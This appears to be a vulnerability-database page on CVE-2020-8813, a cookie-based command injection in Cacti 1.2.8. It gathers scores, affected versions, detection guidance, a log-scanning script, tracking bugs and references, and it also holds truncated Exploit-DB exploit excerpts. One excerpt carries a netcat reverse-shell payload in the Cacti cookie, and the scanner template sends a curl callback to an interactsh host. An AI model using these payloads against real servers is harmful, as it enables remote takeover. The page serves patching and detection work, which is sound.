CVE-2020-8813
Published: 2020-02-22
Priority: P1, 88 (high). CVSS 3.1 base score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Tags: ITW exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 73.78% (99.4th percentile)
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.
Affected (11 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cacti | cacti | — | — |
| cacti | cacti | >= 0 < 1.2.10+ds1-1 | 1.2.10+ds1-1 |
| cacti | cacti | >= 0 < 1.2.10+ds1-1 | 1.2.10+ds1-1 |
| cacti | cacti | >= 0 < 1.2.10+ds1-1 | 1.2.10+ds1-1 |
| cacti | cacti | >= 0 < 1.2.10+ds1-1 | 1.2.10+ds1-1 |
| debian | cacti | < cacti 1.2.10+ds1-1 (bookworm) | cacti 1.2.10+ds1-1 (bookworm) |
| debian | debian_linux | — | — |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| opmantek | open-audit | — | — |
Detection & IOCs (extracted from sources)
cookie: Cacti=%3Bcurl%20http%3A//<interactsh-url>
sigma
```yaml
id: CVE-2020-8813
http:
  - raw:
      - |
        GET /graph_realtime.php?action=init HTTP/1.1
        Host: {{Hostname}}
        Cookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}
```
Detection guidance:
- Monitor HTTP GET requests to /graph_realtime.php?action=init with a 'Cacti' cookie containing shell metacharacters (e.g., semicolons, ${IFS}, nc, bash).
- Alert on the 'Cacti' cookie value containing URL-encoded shell injection patterns such as %3B (semicolon), %24%7BIFS%7D, or nc/bash references.
- Detect POST requests to /user_admin.php enabling guest realtime graph permissions (section25=on, section7=on, tab=realms) as a precursor to exploitation.
- Check for the string 'poller_realtime.php' in the response body of /graph_realtime.php?action=init as an indicator that the guest realtime feature is enabled and the target is vulnerable.
- Use Shodan/FOFA queries for Cacti login pages (favicon hash -1797138069, title 'login to cacti') to identify exposed instances for proactive patching.
Notes:
- The unauthenticated RCE path requires the 'Guest Realtime Graphs' privilege to be enabled on the Cacti instance; exploitation is not possible if this setting is disabled.
- The authenticated exploit variant first enables guest realtime permissions via /user_admin.php before sending the malicious cookie, meaning admin credentials are required for that attack path.
- The Metasploit module defaults to port 443 with SSL and uses php/meterpreter/reverse_tcp as the default payload; detection rules should account for HTTPS traffic to the vulnerable endpoint.
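The first two detection bullets above, turned into a log scanner as an added example (not code from the page or from any of the listed sources). It assumes an Apache-style access log that also records the request's Cookie header (LogFormat "%h %t \"%r\" %>s \"%{Cookie}i\""), peels repeated URL-encoding before matching, and only inspects requests to /graph_realtime.php?action=init; the log lines are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (assumed format: "%h %t \"%r\" %>s \"%{Cookie}i\"").
# Lines 1, 2 and 5 carry an injected Cacti cookie; line 3 is a normal session
# cookie and line 4 hits a path this CVE does not involve.
SAMPLE_LOG = """\
203.0.113.5 [22/Feb/2020:10:01:02 +0000] "GET /graph_realtime.php?action=init HTTP/1.1" 200 "Cacti=%3Bcurl%20http%3A//example.invalid/x"
203.0.113.9 [22/Feb/2020:10:01:05 +0000] "GET /graph_realtime.php?action=init HTTP/1.1" 200 "Cacti=%3Bid%24%7BIFS%7D"
198.51.100.7 [22/Feb/2020:10:02:00 +0000] "GET /graph_realtime.php?action=init HTTP/1.1" 200 "Cacti=4b2f9e1c0a7d; PHPSESSID=deadbeefcafe"
198.51.100.8 [22/Feb/2020:10:02:30 +0000] "GET /index.php HTTP/1.1" 200 "Cacti=%3Bid"
203.0.113.11 [22/Feb/2020:10:03:00 +0000] "GET /graph_realtime.php?action=init HTTP/1.1" 200 "Cacti=%253Bid"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) "(?P<cookies>[^"]*)"$'
)
# Shell metacharacters and helper binaries named in the detection guidance.
META_RE = re.compile(r'[;|&`$]|\$\{IFS\}|\b(nc|bash|sh|curl|wget)\b')


def cacti_cookie(cookie_header):
    """Return the raw (still URL-encoded) value of the 'Cacti' cookie, or None."""
    for part in cookie_header.split(';'):
        name, _, value = part.strip().partition('=')
        if name == 'Cacti':
            return value
    return None


def decode_fully(value, rounds=3):
    """Peel up to `rounds` layers of URL-encoding (catches %253B-style double encoding)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_cacti_cookie(decoded):
    """True when the decoded cookie value carries shell metacharacters or tool names."""
    return bool(META_RE.search(decoded))


def scan_log(text):
    """Return one finding per request to graph_realtime.php?action=init with an injected cookie."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed log format; skip
        path = m['path']
        if not path.startswith('/graph_realtime.php') or 'action=init' not in path:
            continue
        raw = cacti_cookie(m['cookies'])
        if raw is None:
            continue
        decoded = decode_fully(raw)
        if suspicious_cacti_cookie(decoded):
            hits.append({'ip': m['ip'], 'time': m['ts'], 'cookie': decoded})
    return hits
```

A plain session value such as 4b2f9e1c0a7d never matches, so the rule stays quiet for legitimate realtime-graph users; widen META_RE only after checking what your Cacti build actually stores in that cookie.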
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| osv | — | 8.8 | HIGH | — |
| vulncheck | — | 8.8 | HIGH | — |
| vendor_debian | — | 8.8 | HIGH | — |
GHSA
GHSA-gg99-fwr4-rcj9: graph_realtime
ghsa_unreviewed · 2022-05-24 · CVE-2020-8813 · HIGH · CWE-78
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.
OSV
CVE-2020-8813: graph_realtime
osv · 2020-02-22 · CVSS 8.8 · HIGH
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.
VulnCheck
Cacti Cacti Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck · 2020 · CVSS 8.8 · HIGH
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.
Affected: Cacti Cacti
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2020-8813; https://blog.xlab.qianxin.com/catddos-derivative-en/
Exploit PoC: https://vulncheck.com/xdb/167031624578; https://vulncheck.com/xdb/25649809565f; https://vulncheck.com/xdb/d5d2581a5455
Debian
CVE-2020-8813: cacti
vendor_debian · 2020 · CVSS 8.8 · HIGH
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.
Scope: local
bookworm: resolved (fixed in 1.2.10+ds1-1)
bullseye: resolved (fixed in 1.2.10+ds1-1)
forky: resolved (fixed in 1.2.10+ds1-1)
sid: resolved (fixed in 1.2.10+ds1-1)
trixie: resolved (fixed in 1.2.10+ds1-1)
No detection rules found.
Exploit-DB
Open-AudIT Professional 3.3.1 - Remote Code Execution
exploitdb · 2020-04-29 · CVSS 8.8 · CVE-2020-8813 · HIGH
```python
# Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution
# Date: 2020-04-22
# Exploit Author: Askar
# CVE: CVE-2020-8813
# Vendor Homepage: https://opmantek.com/
# Version: v3.3.1
# Tested on: Ubuntu 18.04 / PHP 7.2.24
#!/usr/bin/python3
import requests
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) != 6:
    print("[~] Usage : ./openaudit-exploit.py url username password ip port")
    exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
request = requests.session()
def inject_payload():
    configuration_path = ur
```
Exploit-DB
Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)
exploitdb · 2020-03-02 · CVSS 8.8 · CVE-2020-8813 · HIGH
```ruby
# Exploit Title: Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)
# Date: 2020-02-29
# Exploit Author: Lucas Amorim (sh286)s
# CVE: CVE-2020-8813
# Vendor Homepage: https://cacti.net/
# Version: v1.2.8
# Tested on: Linux
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Cacti v1.2.8 Unauthenticated Remote Code Execution',
  'Description' => %q{graph_realtime.php in Cacti 1.2.8 allows remote attackers to
    execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has
    the graph real-time privilege.},
  'Author' =>
    [
      'Lucas Amorim ' # MSF module
    ],
  'License' => MSF_LICENSE,
```
Exploit-DB
Cacti 1.2.8 - Remote Code Execution
exploitdb · 2020-02-24 · CVSS 8.8 · CVE-2020-8813 · HIGH
```python
# Exploit Title: Cacti 1.2.8 - Remote Code Execution
# Date: 2020-02-03
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2020-8813
# Vendor Homepage: https://cacti.net/
# Version: v1.2.8
# Tested on: CentOS 7.3 / PHP 7.1.33
#!/usr/bin/python3
import requests
import sys
import warnings
from bs4 import BeautifulSoup
from urllib.parse import quote
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) != 6:
    print("[~] Usage : ./Cacti-exploit.py url username password ip port")
    exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
def login(token):
    login_info = {
        "login_username": username,
        "login_password": password,
        "action": "login",
        "__c
```
Exploit-DB
Cacti 1.2.8 - Authenticated Remote Code Execution
exploitdb · 2020-02-03 · CVSS 8.8 · CVE-2020-8813 · HIGH
```python
#!/usr/bin/python3
# Exploit Title: Cacti v1.2.8 Remote Code Execution
# Date: 03/02/2020
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2020-8813
# Vendor Homepage: https://cacti.net/
# Version: v1.2.8
# Tested on: CentOS 7.3 / PHP 7.1.33
import requests
import sys
import warnings
from bs4 import BeautifulSoup
from urllib.parse import quote
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) != 6:
    print("[~] Usage : ./Cacti-exploit.py url username password ip port")
    exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
def login(token):
    login_info = {
        "login_username": username,
        "login_password": password,
        "action": "login",
        "__csrf_m
```
Exploit-DB
Cacti 1.2.8 - Unauthenticated Remote Code Execution
exploitdb · 2020-02-03 · CVSS 8.8 · CVE-2020-8813 · HIGH
```python
#!/usr/bin/python3
# Exploit Title: Cacti v1.2.8 Unauthenticated Remote Code Execution
# Date: 03/02/2020
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2020-8813
# Vendor Homepage: https://cacti.net/
# Version: v1.2.8
# Tested on: CentOS 7.3 / PHP 7.1.33
import requests
import sys
import warnings
from bs4 import BeautifulSoup
from urllib.parse import quote
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) != 4:
    print("[~] Usage : ./Cacti-exploit.py url ip port")
    exit()
url = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]
def send_exploit(url):
    payload = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port)
    cookies = {'Cacti': quote(payload)}
    path = url+"/graph_realtime.php?acti
```
Nuclei
Cacti v1.2.8 - Remote Code Execution
nuclei · CVSS 8.8 · CVE-2020-8813 · HIGH
Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if "Guest Realtime Graphs" privileges are enabled.
Template:
```yaml
id: CVE-2020-8813
info:
  name: Cacti v1.2.8 - Remote Code Execution
  author: gy741
  severity: high
  description: Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if "Guest Realtime Graphs" privileges are enabled.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade to a patched version of Cacti v1.2.9 or later to mitigate this vulnerability.
  reference:
    - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-ex
```
Bugzilla
CVE-2019-8813 webkitgtk: Incorrect state management leading to universal cross-site scripting
bugzilla · 2020-09-07 · CVSS 6.1 · CVE-2019-8813 · MEDIUM
WebKitGTK Security Advisory WSA-2019-0006 describes the following issue:
CVE-2019-8813
Impact: Processing maliciously crafted web content may lead to universal cross site scripting. Description: A logic issue was addressed with improved state management.
Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before 2.26.1.
Discussion:
External References:
https://webkitgtk.org/security/WSA-2019-0006.html
---
This issue has been addressed in the following products:
Red Hat Enterprise Linux 7
Via RHSA-2020:4035 https://access.redhat.com/errata/RHSA-2020:4035
---
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):
https://access.redha
Bugzilla
CVE-2020-8813 cacti: remote code can be executed when guest users have access to realtime graphs [epel-all]
bugzilla · 2020-03-04 · CVSS 8.8 · CVE-2020-8813 · HIGH
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of epel-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects
Bugzilla
CVE-2020-8813 cacti: remote code can be executed when guest users have access to realtime graphs [fedora-all]
bugzilla · 2020-03-04 · CVSS 8.8 · CVE-2020-8813 · HIGH
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue aff
Bugzilla
CVE-2020-8813 cacti: remote code can be executed when guest users have access to realtime graphs
bugzilla · 2020-03-04 · CVSS 8.8 · CVE-2020-8813 · HIGH
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.
Reference:
https://github.com/Cacti/cacti/issues/3285
Discussion:
Created cacti tracking bugs for this issue:
Affects: epel-all [bug 1810240]
Affects: fedora-all [bug 1810239]
---
This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially supported Red Hat product. Refer to the dependent bugs for status of those individual community products.
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42 · 2021-10-14
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.
This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we
Authors: Yue Guan, Jin Chen, Leo Olson, Wayne Xin, Daiping Liu. Published: October 14, 2021.
Tags: Cybercrime, Threat Research, Attack analysis, Exploit, Exploit in the wild, Interactsh
References
- http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00042.html
- http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00048.html
- http://packetstormsecurity.com/files/156537/Cacti-1.2.8-Unauthenticated-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/156538/Cacti-1.2.8-Authenticated-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/156593/Cacti-1.2.8-Unauthenticated-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/157477/Open-AudIT-Professional-3.3.1-Remote-Code-Execution.html
- https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view
- https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129
- https://github.com/Cacti/cacti/issues/3285
- https://github.com/Cacti/cacti/releases
- https://lists.debian.org/debian-lts-announce/2022/12/msg00039.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M77SS33IDVNGBU566TK2XVULPW3RXUQ4/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WAX3LDXPIKWNBGVZSIMZV7LI5K6BZRTO/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XEMDQXDRNQYXOME7TACKDVCXZXZNGZE2/
- https://security.gentoo.org/glsa/202004-16
- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/